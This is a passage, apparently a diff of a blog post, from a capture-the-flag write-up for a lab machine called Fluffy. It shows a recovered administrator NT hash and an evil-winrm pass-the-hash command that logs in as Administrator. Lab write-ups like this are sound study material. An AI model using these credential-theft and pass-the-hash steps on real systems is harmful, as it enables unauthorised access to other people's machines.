furious-05/furious-05.github.io/_posts/2025-09-20-Fluffy-writeups.md

 [*] Trying to retrieve NT hash for 'administrator'
 [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
 ```

+### Pass-the-Hash — Administrator Access

+Using pass-the-hash, I accessed the system as Administrator:

 ```
 evil-winrm -i $IP -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'